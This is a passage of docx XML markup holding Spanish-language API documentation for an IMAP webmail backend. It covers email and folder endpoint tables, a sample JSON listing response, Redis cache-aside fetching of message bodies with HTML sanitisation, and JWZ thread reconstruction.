              <w:t xml:space="preserve">(default: false)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/emails/batch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Operaciones batch sobre múltiples emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">operation: 'move' \| 'delete' \| 'setFlags'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">emailIds: string[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">targetFolderId?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">flags?: Partial&lt;EmailFlags&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/emails/:id/thread</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Obtiene todos los emails del mismo hilo/conversación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de response para listado de emails:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Response GET /api/accounts/:accountId/emails?folderId=xxx&amp;limit=50</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"emails"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"507f1f77bcf86cd799439020"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"uid"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">15432</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"messageId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;abc123@ejemplo.com&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"threadId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"hash_thread_abc"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"from"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Remitente"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"address"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"remitente@ejemplo.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"to"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Destinatario"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"address"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"dest@ejemplo.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>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"Reunión de seguimiento"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"date"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2026-01-15T10:30:00Z"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"preview"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Hola, te escribo para confirmar la reunión..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"flags"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"seen"</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"answered"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"flagged"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"deleted"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"draft"</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"hasAttachments"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"attachmentCount"</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"size"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">24580</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"pagination"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"page"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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"limit"</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"total"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1247</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"hasMore"</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p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/emails/:id/body</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">implementa el patrón cache-aside: primero consulta Redis, y en miss ejecuta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UID FETCH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BODY.PEEK[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vía imapflow para obtener el mensaje completo, lo parsea con PostalMime para extraer HTML y texto plano, sanitiza el HTML con DOMPurify, y almacena el resultado en Redis con TTL de 3600 segundos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[152]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[99]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El uso de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BODY.PEEK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">evita marcar implícitamente el mensaje como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\Seen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, preservando el estado de lectura hasta que el usuario interactúa explícitamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[70]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[78]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/emails/:id/thread</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">implementa el algoritmo JWZ (Jamie Zawinski, 1997) para reconstruir conversaciones: busca todos los emails con el mismo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">threadId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(un hash determinista del Message-ID raíz del hilo) ordenados por fecha, construyendo el árbol de parent-child mediante los headers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Reply-To</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[56]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="91"/>
    <w:bookmarkStart w:id="92" w:name="carpetas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.4 Carpetas</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1173"/>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="2053"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Método</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Body Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Query Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/folders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lista carpetas de la cuenta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">subscribedOnly?: boolean</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default: false)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/folders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Crea nueva carpeta en el servidor IMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">name: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">parentPath?: string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
